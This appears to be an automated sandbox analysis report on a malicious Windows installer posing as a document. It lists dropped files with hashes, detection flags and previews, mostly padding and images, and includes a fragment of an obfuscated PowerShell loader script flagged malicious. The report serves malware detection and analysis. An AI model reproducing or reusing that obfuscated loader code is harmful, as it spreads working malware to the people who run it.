Reputation:	low
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...F.q...z.O..H......b?hs.*.i...\..m...e!.Q....8.........5..Qc1G..N+n....1.zP..:M.R...=sW.F..".q.X...9..d..,.8.ZVZ....#.....l..`Q.{...4;\|.....".!..x...y.S$.........p...,.!?(.c'..V....V_L...U.8.C..=..z..IVveC.g<c..}h..XX..........lIbP.#.h....@.........6..^>.{.. ....@=3@.T.x9..;....&...z{.S..wP?....c-... .R...h.,..X..QIc .)y..#n...5.#FU..F{..@..../.,@(<.....

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Fisketure\blastocoelic.udh

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	8694765
Entropy (8bit):	0.15839194417486638
Encrypted:	false
SSDEEP:	384:DIzrB2McKPigy/HRwT7VEdQ5SvndUj84rbA6ZEIMYYF:DIzoMcKPxy/xwT7VEdQ2ny84rbA6cYYF
MD5:	655BE5AF6F234B3646A92D32F91A9D6C
SHA1:	22695B48B1D335E5E9D5CEB7AA048636CCA825F2
SHA-256:	1A919F4E4CA5FEBEC29B479D087963C0FAA292D17148B9BD34FC14F31A8BA9E5
SHA-512:	9C02486ADDAF34A48B967492686B81DA7DA6900BFC2C107874E2C7F48521AEC9AC8B2203E3CB8F5B776BD6994D9A18F529C785F3B5434F9F693A927102605BE5
Malicious:	false
Preview:	............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................i....................................................................................................................................................................................................... .................................................................].............................................................................................................a.....q....I.............R.......................................................................................................

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Fisketure\bracteole.jpg

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 597x537, components 3
Category:	dropped
Size (bytes):	64588
Entropy (8bit):	7.9675107645856125
Encrypted:	false
SSDEEP:	1536:WwjL71e5pGwlnFMIro2l0cGZLoYrPqQN5c:TLxCpLF30ckDqH
MD5:	FA39AD884DD7EAEFF3FE736F3A138960
SHA1:	B2702159B561A2408E63D67E188582243AFD28F2
SHA-256:	A21B0B4C648C7EB8966FC3FDC8BAAAECAEC2AD6490BA35B3E71FDF4F662F3B14
SHA-512:	B35A568B9F85F2971026FA058EF4DE888136C21FF5B4BEE78BEB25B652642DCA0252C2F1ECCBCC107BD09B8E8B5BCA796C7EEC80BD3A069B6FE3521F8123B094
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........U.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...pU.r...{.ib0....oOcW.7.$..#.OB=....j..2..P..a..%G,..'..zb0#..h.b.R..n.=.?2......c.........c..?...G^{U...^.T.E..1..;{..hb>.26.s..*.!.Q.jP.M...I.p..T./..R...I..j.B...n...3R..(..s........9b"M.n.....F...kE....\c.NV...88..I......0.O.......,......~4....../..q....+.Fy.0...VYP:..Mu.P..R...RO.z.{.9.K.) zS..)..r...)....."y.eY.6..x".q.%$.W.o.j........-.....jwK....v+

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Konflikters\divorced.ini

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	Generic INItialization configuration [EMNEGRUPPER RAMIFEROUS]
Category:	dropped
Size (bytes):	339
Entropy (8bit):	4.660247593373898
Encrypted:	false
SSDEEP:	6:dxbXdQqCrrFKvnpjbI9tL26DhOx/HgQlyFFIMFRY3EaUMiCv2VRshyyyPxCn:dxNQHoh+tLcqFTFoTiCeVRcyrPxCn
MD5:	4B649E9C34B90DEB4D38AC7F83DC2450
SHA1:	2E8B480211A648BE28803648DCF43954EDC7960B
SHA-256:	1A81EE0409CDB4F128BDD0FCB27CFD06BA81702362281D063B5BB5265FF3F05F
SHA-512:	94868D9618F577A45A8B287E69032BA9383F16F6F92C4FCCFD1B62F0A39B9DD4E7501A6A391BBBB3EF298B783AFF29528DDD09C9F411EDE01F323E068D27FC71
Malicious:	false
Preview:	[flintlagene budcentrals]........krigstidens dslet bacteriopurpurin webers aarmillionerne aizoaceae.Redigeringsprogrammerne klbebaandets semiaquatic plicative nonpermanency stenuld agricultures..Manhunter connubiality smittedes amalings deuteroplasm arturo springle,ulejliger foregaar linjenummmer sdestes........[EMNEGRUPPER RAMIFEROUS]..

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\doc20250319-00712.bat.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1565871
Entropy (8bit):	7.871193176291519
Encrypted:	false
SSDEEP:	24576:w7OZUF/4SMcGNWsf5JTXkTLs7+6ao7Otp2V+PT3Vf2YtEb0OQ7FBm1sQ+Rw:wK04sF45JTKsH6p2CTt5HKyQ+K
MD5:	0F8D5C1387254083BA2886DA0119DD4E
SHA1:	B94E09F2DE72827E57981A451940A329A311274A
SHA-256:	6D017FF436A539B349744A0CAF5FDA43E08F4C861333AA0662AB8CC04945B848
SHA-512:	C8D12D97EB6A7CF1DEA8432E7FE431FED755CCB347708913EA274C31F25F431466FEF315BB14B45ADFD278547B4B28BF1180EB72866B03E83AA374A2E7B1711B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 31%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................^...\|.......0.......p....@..........................0...............................................t..........03...........................................................................p...............................text....].......^.................. ..`.rdata.......p.......b..............@..@.data....T...........v..............@....ndata...................................rsrc...03.......4...z..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\doc20250319-00712.bat.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\rygtes.bor

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	980805
Entropy (8bit):	0.16034872308135723
Encrypted:	false
SSDEEP:	1536:7eP05MQjsA6Pj6of2FMH6kfWkAjWDr3zdksd+o:2
MD5:	0819CCBCE6BAB7801A3DB7B4E1035220
SHA1:	EB0FB2EFCE0205B7FDB2B68BF6F3AA872D950DA3
SHA-256:	C1D65A2A3035E21E6B7FE328AFA708C7003102BB4B35BBF13EFE72F945A59BE0
SHA-512:	4E3688AC11EDF20465896CEBCAF6CCBFA483A410D9D68B983DD77D97B264177899AE7A3CA72BCB5C630F548440076E9689A45D555F791B07A63C86880186597F
Malicious:	false
Preview:	........................................................................................................................................................................................................2..........................................7...................................................................................................................................................................................................f...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\stallenger.txt

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	517
Entropy (8bit):	4.299812184701076
Encrypted:	false
SSDEEP:	12:ifTkto/9FjReANAM+iDB+/ypGPQPoZhqm05XY7l3Am8Wuiy:oTktolFjsc5DBeypGUMYI7V8Wq
MD5:	3D93F12FC3C0DCD44A6F44FC06622F99
SHA1:	D6D8FE2D57E3500EDF752407E513C771C8ACD089
SHA-256:	789A9A03C302A2CEF7FA21EB0905F0B4EAA7A66AAB3C8EFB58B2E18DC0852E03
SHA-512:	2B85710EA7B2FAB2A812B3668670F5194855D86BD1F8656970A90664C4C508F1592D00E65364CCAAE924AB9931EB436D80076F2AD400BAC3B2A0DD84435C0598
Malicious:	false
Preview:	kvivalenter signe basiskonventioner uglifiers omnihumanity,wasabi baandoptagelses homoousianist atonies linnaeite uncribbed reascents misenrolls samosas....;skadefryden sandalens forbundsstatens,ruflendes toskish odorously..;idrtsforeningens sortwith betjeningens nongipsy superformal unbuckled metalinguistics,nondexterity ugepenge pricey carraways organolead indesluttethed..basidigitale redoubles thunderstone fores.Fittit clangour solodanserens ropiest pseudofluorescence cheerfulises unsubstantialise flatirons..

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\vandlbsloven.ini

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	362
Entropy (8bit):	4.727422153767004
Encrypted:	false
SSDEEP:	6:TQYOAHhTLFmbIMPMjwBFn7JV3mWX00vAEw5ggBqToHAtzMZMDIqvSLutuRBfgi+p:TQYOAHVLF1jwBFnNFF0y0qToHAyMUqvV
MD5:	B48FBAF86C5088340C95EC175431C5B1
SHA1:	6052D2A81ABA2DF9135E0248D73FDD369C152935
SHA-256:	1142931437300F1EF42D487B79C66715270A35CD597350DF835798A2B32DE1F8
SHA-512:	BD04644B786B70010E99741E9383987CE6D9788BF58B0879E6524F181C64DEE04AD1E63F03BCC480C344048F1F28D6B831C350DD13130BF7A1C072E8602FBFA0
Malicious:	false
Preview:	Sesquicentennially misinstructs uruguayeren administrationspakken lugtgenernes liquidamber strepsis sanitetsvsnets unprophetlike overlover..[aggraver prsentableste]..aslgs mediaevals chromatocyte kiropraktisk boligbyggeri,signalbehandling underskriftsindsamlingers philippine tragtnings amts skattetilsvarets..[KLOSTERMURE SSTERS]........[TYRENE RETTEARBEJDES]..

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\husmdrenes.jpg

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 346x370, components 3
Category:	dropped
Size (bytes):	6387
Entropy (8bit):	7.699376223185307
Encrypted:	false
SSDEEP:	192:LmVQb68dmb30hYN8AlAfmn5M1qmPhD+/pHFsh:Kqb68dmCYN8bmn5M1qZjsh
MD5:	18C710615E8BA2D55D6166FEE9AA0288
SHA1:	70CF39BAD0F5EDA77BD139247B4CBCA19CB39451
SHA-256:	5BED7060DB7103200B8D6E7380B2B360096DB0D8F1B45757FC53A1C6748041C3
SHA-512:	039FEECF0B5761C82E330F5C8DCFF5D1ADB0F59E7E7E95AE14E00396B80F2FE21EF54DDD23FF6E27D44CFAEECBAF648DCEAB5A1EBB184F6FC17E7D10C6808706
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.Z.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..-.(.B.E.{TS..b.."..j.X.s.~.r......?.HM.)...;8.2Ef..F.....Y....S.Sf....aZ.....e.R1.LH.x...L...'.M'.i.D..(<S3.9i1.Pi..<..J..Zi4...M...i?.)).CMcN5...s.O.5.4.h...SI...FA...M..cpW"...K....-..O...75"..@..S.F....@..i:T....8...Z..5^E......5.s...].....D....O&.g..g:..Z!..8.\|...*..#.Tx....#..w6.5;0U.[....;6(.M....Z..HWs.D.6Q....!W....m\.....eE..j.y....c.I...

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\liberales.ske

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	777 archive data
Category:	dropped
Size (bytes):	6267263
Entropy (8bit):	0.15864534746730277
Encrypted:	false
SSDEEP:	384:9k7TfUEQ5Yla7m4M+D9XIEVEBe0WalFvzhrMIirQoHOGVQzOFuym4PTiJSOSHt52:QcKk5x9GSH5PaqU
MD5:	3D3DF9F14ECD477DFE16E58F4069A161
SHA1:	7F75FADD66AB631FD39D46074A10C04D8C4A15E4
SHA-256:	893FE75C7C2ED475E482A353E7751655D98A334B84278BA5B0774D6B2495775C
SHA-512:	140588372148EA97D77D3DE5FD468FC546AEE008A2727B36A7F1E8909F42978FD0698571E2C47271123ED97A8CB7CAA1D976021D8125315FE078C8DF49646181
Malicious:	false
Preview:	7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777.77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777.777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777.777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777.7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777.77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777^777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777.777777777

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\qung.txt

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	205
Entropy (8bit):	4.40635321862841
Encrypted:	false
SSDEEP:	3:rSZ1hisGce6tMAXgTXXuWGqRYqaLzSP29GF1MRVgJeCAJseAqHwov:kHice6tMJXXMqRdaLz5S1K0eCA8ywy
MD5:	46E64733E872C18E362AB1CAAB83D40D
SHA1:	35FF67A93E38D7B4C8FD6CC076125A516E0C115D
SHA-256:	05DF8A18B8A1747808C75910B83E91969A566956616198A120FCBB72106A94CB
SHA-512:	F33491B0A795B7249B7847933E0FBB2B0F41F702C47C160F96E44F14B5B679A62A2FBEDF138E711EA216F98FF90FF287F0ECB05605354A90E07C3301A65EDFBF
Malicious:	false
Preview:	............[brdefuld polemised]..........Macrorhinus skrotningernes borals katamorphism sandsynliggjorte instrumentist sinologernes,fejemaskiners overnattes halvdagsbeskftigelserne charmetrolds kisserup..

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\rias.ini

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	497
Entropy (8bit):	4.347340341409307
Encrypted:	false
SSDEEP:	12:nnvX9e2qgPDoGOy8NdCHeMwqKHa1nriHXtlFd0o8oIZSVOy:/9bgccgHevha2Fd0wIZ4
MD5:	B408500A7A78885E1A92A7D88F38E8D3
SHA1:	0208137187B5625C40733BF6474F652EB3464B84
SHA-256:	B20FA64FDEFA2367AEB0CF568C7DB7B4745D156C3902CEF7E8514F768EC7CD19
SHA-512:	59B1B697696BC02C20C46A6DC0B5400A757A1F416335A1BB407DA84B38C2F8E3B9BC7A6FEF7AD4A585DF082AAEDA0A240DA1F4AB0E03F361A5E21136AC2B0D78
Malicious:	false
Preview:	tilstrmninger misdderes gespensters caldadaria,arkivstykke omend lseferie forfaldet tilspidsninger slatify ungroundedly..socialbedrager chromochalcographic yachtklubbernes buddings rabatkuponernes tingfstende chinchiness.Vaad bivogne kroningers stillets defekterne semperjuvenescent sonantic gratine......Firsertid curmurging omtrentligt blokindskuddet hemmelige kontrolassistenterne..;unreprovedness fortrngningerne kvaksalver.Allower brickbatting sprudledes overstregningerne slippet mindeords..

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\geminated.txt

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	288
Entropy (8bit):	4.724259402687155
Encrypted:	false
SSDEEP:	6:ejl8E1XUfv9ehAeprWLhE86vMhAWKsgkJ3WKELiUqifG9qhJn:eJVdUn9MAeJWLS86M8sl3Wt2ep7
MD5:	695CA53CDDF0899B70F69F00BE244F81
SHA1:	FA30372BA29DCFEB6301D315133F07D4866C2637
SHA-256:	1CBD890CD78228C460EFD334C107FE121C96A1240E756C16D16784DE247F36E9
SHA-512:	B6D0A817F6D71AACB9F56290C2F1031447AFAEDD6F5CE81C47488C843C181D04B2A568264E407D2A3C67C98E6661CB3BF7F0982CEE4EC3BB5A3E35C993232C6D
Malicious:	false
Preview:	..........gruppeejernes uncamp procreated,baadfrere rekyleredes aktivitetsrunde bespnder wapping bagakselen..[TRKPLASTRENE JOURNALISERS]..flaner hydroeconomics baronessernes groggerne equipollentness liciteredes chromosome agertidselens.Myodiastasis konformismen tetravalent shoppiest....

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\fyldstoffet.bar

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	3601156
Entropy (8bit):	0.15791535845103283
Encrypted:	false
SSDEEP:	1536:2VtQ7jV2L52nyYJqk721Lbleo2faUG+gGL9JIX6GXWsTw9yGplabJMzovh0PEgBN:hn4nG
MD5:	C597534C123E47AE1008065EC9BA84BD
SHA1:	F601B3FDD9EE65C00BED32166292363FCA86498D
SHA-256:	5080314DE8DFB413D94390425758F9A433E026882569626018EEA2EEB34F10A5
SHA-512:	B84D7D72B3F8E225568F2AAD1ABF26D7FA392D4B8D6A0023F403D03D53B93BDA17B1E6AD15A6E57522A351DAA2EC742B03EE2DC43E4E0EACB8EDBB3879C2868A
Malicious:	false
Preview:	uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu.uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu.uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu.uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu.uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuMuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu.uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuumuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu@uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuubuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4553), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	79753
Entropy (8bit):	5.130378266872637
Encrypted:	false
SSDEEP:	1536:/ZjPDVmpICoBn2xP2+3BHG2aaOksNxitH09j0sLaobknm/Rpjc5veIOkMRwkK:/ZjPKRan2w+FdaRjwxaj0iaoonmZp4eO
MD5:	D1139A6E58AC82C0E59AD6B9DC60FE99
SHA1:	2FF9A2A1D0A3C4D97F95687B69040C68516A5A2F
SHA-256:	89A99E297E9CF7C4890FF83F0AF6E5CA59F205E51575EE709863460D0F47A0BA
SHA-512:	335871EB5ED23B7C176EFCA5400DFB5E01743AE3E95D3E550B42C9A8CED9D30EF2D8C08FB55731C766957817DE03415C5E4C8112C845D6DD346F487A99F45566
Malicious:	true
Preview:	$Cheetahs=$Spanternes43;........$titanias = @'.Sammensv. Skurpen$KartotekTGia tspirMascou,eaProvidenfSorte muiCoggleorkPiskefldm KonvergiThistedbn spooferiAfterharsskraareptVrkstedse HalfamorRomancic=redre.se$V.saingbNInterbroaHy.oglostSalinosuuTriconsor maksimuijobberigsVampetrimSke saarespil evanSalatdre;Elwynca .Tal nersfHelmersiuKibbutzinPanfishsc Studenttregist eiCoecalchoPatru,tynHjkonj n Edg dfluGFootpadueLoomisbliUnd.rkopsTaphulleo ndsletsn Pro ram Reelemen(Cin rato$Af,indphCGaffelfohMa katsquVa tvrnetSkyggetizAfricma.pUnful,ina Hous.kln Aswi heiBrystsvmkSpirodel,Pre,osed$afpudsniS odedesmkReabs ncd ,aanekrsIndskibnkPolitburi Ste tilnSkattepldEkstatis)Lunge us hers.abs{Chlor lf.talepdag.Pantochr$SknnedesWeventuelemouth,balSkovhyt,c SlugterhNoedtbiaeFrogfishrRaastofm fricati.( ProtophFPurasatilGollywogaChec,endg UtrtteleSkarnsknlGletsc elTe.anismamudreafsr fkvistniCanoniseaVederkvg fornuftv'BlodhvneKUnderlevoMisformsoStenkulsr MonitordViscometiSpasmernnReplum yeZionisme$Prvelsl

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Postdicrotic.Mil

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	337252
Entropy (8bit):	7.601819920360812
Encrypted:	false
SSDEEP:	6144:X8JlCuoGOAtY8OGEuUAFkBBQ89LGYPqi3VjcCrF/I22e1SwOR1M2yFXm48:X8zLlOEY8IuNFkM88YX3VjvhIuOjM7Y/
MD5:	50324A8ED8FC78B9B066F6AC6B5E40E3
SHA1:	B660AB09C56706F7BFFAA84A2C1A0454F4BE3522
SHA-256:	4BC8A44AA8EBC49AD45B6A900D3C0124228132918DB18482DB8370C1D62D4F14
SHA-512:	9B296C1640AD5430EBE3CB36C4FF554AF241A21DEE1EC5C17C2A3293BD0D546FAFAEA9899C6C47FBB6541552A7C18BAAFF02A443747C11CD8BC75EB3658507A4
Malicious:	false
Preview:	...........~................B..........ggg........................................}.D............&&..............~................................................................6...G..............:......................333........................}}....4........./.......*....fff....y..................JJ..#.77...........a.................=...........E..........H..{.....z............^...../..W......L........................@@@@..H...xxx...X.S.....A...CC.../...CC....................................................d...................kk.....,.......!!........a...:::.............]]]].....JJJJJ..g.........aa........................,,,.nnn.l...................u.?...........MM......Q.1111...OOOO...............www.....ee..t..0..........\...}}}.n......Y..M.........66............a..... ...........3.........&...........z..oo..............%%%._....j.............................s......q...7......\|....::.\|....6......................::............ppp..b................._...........................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_msalpvsz.rsi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbwicdfh.osl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbahudbp.krp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yys3yzbu.ozq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.871193176291519
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	doc20250319-00712.bat.exe
File size:	1'565'871 bytes
MD5:	0f8d5c1387254083ba2886da0119dd4e
SHA1:	b94e09f2de72827e57981a451940a329a311274a
SHA256:	6d017ff436a539b349744a0caf5fda43e08f4c861333aa0662ab8cc04945b848
SHA512:	c8d12d97eb6a7cf1dea8432e7fe431fed755ccb347708913ea274c31f25f431466fef315bb14b45adfd278547b4b28bf1180eb72866b03e83aa374a2e7b1711b
SSDEEP:	24576:w7OZUF/4SMcGNWsf5JTXkTLs7+6ao7Otp2V+PT3Vf2YtEb0OQ7FBm1sQ+Rw:wK04sF45JTKsH6p2CTt5HKyQ+K
TLSH:	8E7523A15D68E4F7F41DC1B147BF9D30886D7E952D7408C7B188B27AE1B70229723A2B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................^...\|.......0.......p....@

File Icon


Icon Hash:	33796d3999dd611e

Static PE Info

General

Entrypoint:	0x4030e2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
